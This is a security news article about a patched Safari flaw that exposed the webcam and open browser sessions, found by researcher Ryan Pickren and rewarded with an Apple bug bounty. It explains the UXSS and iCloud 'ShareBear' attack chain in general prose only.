A researcher has picked up a $100,500 bounty from Apple after discovering a rather nasty method of gaining control of other people’s Macs. The issue, discovered lurking in Safari by Ryan Pickren, could make use of rogue websites to perform a number of dubious actions.
It begins, as so many attacks do, with a single click.
"Check out my website..."
The attacker starts by steering the victim to a specific website and getting them to click on a “play” button via a popup. The bug then deploys files which gives the attacker full control. There’s a peripheral angle, and a browsing angle, to this attack.
First off, the peripheral angle. Falling foul of this one activates the Mac’s webcam and allows an attacker to spy on you. This is, of course, never a good thing in the privacy stakes.
This is actually the second webcam bug found by this researcher. In 2020, Pickren found a zero-day which granted camera access, which Apple fixed. Turns out there’s always another way to get things done, and this is why webcam covers are, at a minimum, a very good idea.
Secondly, we have the browsing angle. It’s not just possible to hijack the webcam with this one. The attacker could also access and interact with anything open in Safari. Essentially, this is a full account takeover in a suddenly very hostile web browsing experience. Have your email account open? The attacker can access it. Social media pages? Same again. About to comment on a local news story involving a lost kitten and a tree? Buckle up, because what’s posted may not be to your liking.
So how did our intrepid student researcher achieve this?
The mighty power of UXSS (Universal cross-site scripting bugs)
The answer is via UXSS, something Google feels to be one of the nastier things floating around the exploit realm. As per the document:
Bugs leading to UXSS attacks are among the most significant threats for users of any browser. From an attacker perspective, a UXSS exploit may be almost as valuable as a Remote Code Execution (RCE) exploit with the sandbox escape.
If you save a website locally, you have the option of saving as webarchive files instead of HTML. As the writeup states, these files specify the web origin that the downloaded content should be rendered in. If attackers are able to modify the file somehow, they’ve as good as reached UXSS nirvana.
The researcher combined this with URI exploration, eventually settling on something called “ShareBear”.
Sharing is bearing
ShareBear leaps into action whenever some remote content needs to be grabbed. This is set in motion via iCloud-sharing: and this has the ability to create a public share link. Taking this link and exchanging “https” for “icloud-sharing” is enough to automatically open ShareBear.
This is where the “Open file” popup mentioned earlier comes into play.
If it’s the first time you’ve seen the popup, then hitting “Open” downloads the file and automatically opens it. The popup is gone forever; the after effects, not so much.
Any website in Safari, via ShareBear, has the ability to launch this file. The creator can alter it however they wish at their end after you said “yes” to opening it, and it’ll download and update the file on the victim’s PC automatically.
As the discoverer of this technique put it:
Agreed to view my PNG file yesterday? Well today it's an executable binary that will be automatically launched whenever I want.
Apple has already fixed this issue, so you should be safe from oversharing bears and webcam indiscretions.